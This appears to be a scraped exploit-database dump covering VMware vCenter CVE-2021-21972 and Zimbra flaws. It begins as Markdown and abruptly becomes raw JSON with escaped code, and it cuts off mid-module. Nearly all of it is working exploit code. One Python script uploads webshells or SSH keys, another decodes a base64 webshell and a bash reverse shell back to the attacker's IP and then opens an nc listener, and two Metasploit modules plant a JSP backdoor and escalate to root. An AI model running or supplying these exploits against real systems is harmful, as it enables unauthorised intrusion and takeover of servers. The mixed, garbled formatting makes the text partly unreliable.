    @jsp_filename ||= "#{rand_text_alphanumeric(8..42)}.jsp"
  end

end
```

## [VMware vCenter Server 7.0 Arbitrary File Upload](<https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html>)

Packet Storm exploit entry PACKETSTORM:161590, published 2021-03-01, for CVE-2021-21972. The script below is cut off in the source at the start of its usage text.

```python
# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload
# Date: 2021-02-27
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html
# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)
# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds
# CVE: CVE-2021-21972

#!/usr/bin/env python3
'''
Copyright 2021 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.

File name CVE-2021-21972.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

CVE-2021-21972 is an unauthenticated file upload and overwrite,
exploitation can be done via SSH public key upload or a webshell
The webshell must be of type JSP, and its success depends heavily on the specific vCenter version

# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister
# A white page means vulnerable
# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)
# Notes:
# * On Linux SSH key upload is always best, when SSH access is possible & enabled
# * On Linux the upload is done as user vsphere-ui:users
# * On Windows the upload is done as system user
# * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui"
# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload

This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)

Features: vulnerability checker + exploit
'''

import os, tarfile, sys, optparse, requests
requests.packages.urllib3.disable_warnings()

lProxy = {}
SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<env:Body>
<RetrieveServiceContent xmlns="urn:vim25">
<_this type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</env:Body>
</env:Envelope>'''
sURL = sFile = sRpath = sType = None

def parseArguments(options):
    global sURL, sFile, sType, sRpath, lProxy
    if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')
    sURL = options.url
    if sURL[-1:] == '/': sURL = sURL[:-1]
    if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL
    sFile = options.file
    if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)
    sType = 'ssh'
    if options.type: sType = options.type
    if options.rpath: sRpath = options.rpath
    else: sRpath = None
    if options.proxy: lProxy = {'https': options.proxy}

def getVersion(sURL):
    def getValue(sResponse, sTag = 'vendor'):
        try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]
        except: pass
        return ''
    oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)
    #print(oResponse.text)
    if oResponse.status_code == 200:
        sResult = oResponse.text
        if not 'VMware' in getValue(sResult, 'vendor'):
            exit('[-] Not a VMware system: ' + sURL)
        else:
            sName = getValue(sResult, 'name')
            sVersion = getValue(sResult, 'version') # e.g. 7.0.0
            sBuild = getValue(sResult, 'build') # e.g. 15934073
            sFull = getValue(sResult, 'fullName')
            print('[+] Identified: ' + sFull)
            return sVersion, sBuild
    exit('[-] Not a VMware system: ' + sURL)

def verify(sURL):
    #return True
    sURL += '/ui/vropspluginui/rest/services/uploadova'
    try:
        oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)
    except:
        exit('[-] System not available: ' + sURL)
    if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely
    else: return False

def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):
    def getResourcePath():
        oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)
        return oResponse.text.split('static/')[1].split('/')[0]
    oTar = tarfile.open('payloadLin.tar','w')
    if sRpath: ## version & build not important
        if sRpath[0] == '/': sRpath = sRpath[1:]
        sPayloadPath = '../../' + sRpath
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'absolute'
    elif sType.lower() == 'ssh': ## version & build not important
        sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'ssh'
    elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):
        ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber
        sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)
        print('[!] Selected uploadpath: ' + sPayloadPath[5:])
        for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)
        oTar.close()
        return 'webshell'
    elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):
        ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>
        sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)
        print('[!] Selected uploadpath: ' + sPayloadPath[5:])
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'backdoor'
    else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):
        ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)
        sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)
        print('[!] Selected uploadpath: ' + sPayloadPath[5:])
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'backdoor'


def createTarWin(sFile, sRpath = None):
    ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows
    if sRpath:
        if sRpath[0] == '/': sRpath = sRpath[1:]  # strip the leading slash, as in createTarLin
        sPayloadPath = '../../' + sRpath
    else:
        sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)
    oTar = tarfile.open('payloadWin.tar','w')
    oTar.add(sFile, arcname=sPayloadPath)
    oTar.close()

def uploadFile(sURL, sUploadType, sFile):
    #print('[!] Uploading ' + sFile)
    sFile = os.path.basename(sFile)
    sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'
    arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}
    ## Linux
    oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)
    if oResponse.status_code == 200:
        if oResponse.text == 'SUCCESS':
            print('[+] Linux payload uploaded succesfully.')
            if sUploadType == 'ssh':
                print('[+] SSH key installed for user \'vsphere-ui\'.')
                print('    Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'')
                return True
            elif sUploadType == 'webshell':
                sWebshell = sURL + '/ui/resources/' + sFile
                #print('testing ' + sWebshell)
                oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)
                if oResponse.status_code != 404:
                    print('[+] Webshell verified, please visit: ' + sWebshell)
                    return True
            elif sUploadType == 'backdoor':
                sWebshell = sURL + '/ui/resources/' + sFile
                print('[+] Backdoor ready, please reboot or wait for a reboot')
                print('    then open: ' + sWebshell)
            else: ## absolute
                pass
    ## Windows
    arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}
    oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)
    if oResponse.status_code == 200:
        if oResponse.text == 'SUCCESS':
            print('[+] Windows payload uploaded succesfully.')
            if sUploadType == 'backdoor':
                print('[+] Absolute upload looks OK')
                return True
            else:
                sWebshell = sURL + '/statsreport/' + sFile
                oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)
                if oResponse.status_code != 404:
                    print('[+] Webshell verified, please visit: ' + sWebshell)
                    return True
    return False

if __name__ == "__main__":
    usage = (
        'Usage: %prog [option]\n'
        'Exploiting Windows & Linux vCenter Server\n'
        'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n'
        'Note1: Since
```
the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? 
[y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt"}, {"lastseen": "2021-06-24T18:30:50", "description": "", "cvss3": {}, "published": "2021-06-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-24T00:00:00", "id": "PACKETSTORM:163268", "href": "https://packetstormsecurity.com/files/163268/VMware-vCenter-6.5-6.7-7.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 06/21/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://kb.vmware.com/s/article/82374 \n# Software Link: https://www.vmware.com/products/vcenter-server.html \n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). 
\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) \n# CVE: 2021-21972 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md \n \n#!/usr/bin/python2 \n \nimport os \nimport urllib3 \nimport argparse \nimport sys \nimport requests \nimport base64 \nimport tarfile \nimport threading \nimport time \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \nmyargs=argparse.ArgumentParser() \nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True) \nmyargs.add_argument('-L','--local',help='Your local IP',required=True) \nargs=myargs.parse_args() \n \ndef getprompt(x): \nprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n \ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"): \nfullpath=\"../\" * 7 + path \nreturn fullpath.replace('\\\\','/').replace('//','/') \n \ndef createbackdoor(localip): \n# shell4.jsp \nbackdoor = 
\"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\" \nbackdoor = base64.b64decode(backdoor).decode('utf-8') \nf = open(\"shell4.jsp\",\"w\") \nf.write(backdoor) \nf.close() \n# reverse.sh \n# After decoding overwrite string 'CUSTOM_IP' for local IP \nshell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\" \nshell=base64.b64decode(shell).decode('utf-8') \nshell=shell.replace('CUSTOM_IP',localip) \nf=open(\"reverse.sh\",\"w\") \nf.write(shell) \nf.close() \n# Move on with the payload \npayload_file=tarfile.open('payload.tar','w') \nmyroute=getpath() \ngetprompt('Adding web backdoor to archive') \npayload_file.add(\"shell4.jsp\", myroute) \nmyroute=getpath(\"tmp/reverse.sh\") \ngetprompt('Adding bash backdoor to archive') \npayload_file.add(\"reverse.sh\", myroute) \npayload_file.close() \n# cleaning up a little bit \nos.unlink(\"reverse.sh\") \nos.unlink(\"shell4.jsp\") \ngetprompt('Backdoor file just was created.') \n \ndef launchexploit(ip): \nres=requests.post('https://' + ip + 
'/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) \nif res.status_code == 200 and res.text == 'SUCCESS': \ngetprompt('Backdoor was uploaded successfully!') \nreturn True \nelse: \ngetprompt('Backdoor failed to be uploaded. Target denied access.') \nreturn False \n \ndef testshell(ip): \ngetprompt('Looking for shell...') \nshell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\" \nres=requests.get('https://' + ip + shell_path, verify=False, timeout=60) \nif res.status_code==200: \ngetprompt('Shell was found!.') \nresponse=res.text \nif True: \ngetprompt('Shell is responsive.') \ntry: \nresponse=re.findall(\"b>(.+)</\",response)[0] \nprint('$>uname -a') \nprint(response) \nexcept: \npass \nreturn True \nelse: \ngetprompt('Sorry. Shell was not found.') \nreturn False \n \ndef opendoor(url): \ntime.sleep(3) \ngetprompt('Executing command.') \nrequests.get(url, verify=False, timeout=1800) \n \ndef executebackdoor(ip, localip): \nurl=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\" \nt=threading.Thread(target=opendoor,args=(url,)) \nt.start() \ngetprompt('Setting up socket '+localip+':443') \nos.system('nc -lnvp 443') \n \nif len(sys.argv)== 1: \nmyargs.print_help(sys.stderr) \nsys.exit(1) \ncreatebackdoor(args.local) \nuploaded=launchexploit(args.target) \nif uploaded: \ntested=testshell(args.target) \nif tested: \nexecutebackdoor(args.target, args.local) \ngetprompt(\"Execution completed!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163268/vmwarevcenter70-exec.txt"}], "zdt": [{"lastseen": "2023-06-03T16:28:41", "description": "This Metasploit module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. 
The core vulnerability is a path traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on Zimbra Collaboration Suite Network Edition versions 9.0.0 Patch 23 and below as well as Zimbra Collaboration Suite Network Edition versions 8.8.15 Patch 30 and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T00:00:00", "type": "zdt", "title": "Zimbra Zip Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-25T00:00:00", "id": "1337DAY-ID-37925", "href": "https://0day.today/exploit/description/37925", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n 
super(\n update_info(\n info,\n 'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => 
[IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => 
\"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:04:51", "description": "This Metasploit module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. 
As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T00:00:00", "type": "zdt", "title": "Zimbra zmslapd Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-10T00:00:00", "id": "1337DAY-ID-37907", "href": "https://0day.today/exploit/description/37907", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 
'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo 
isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n 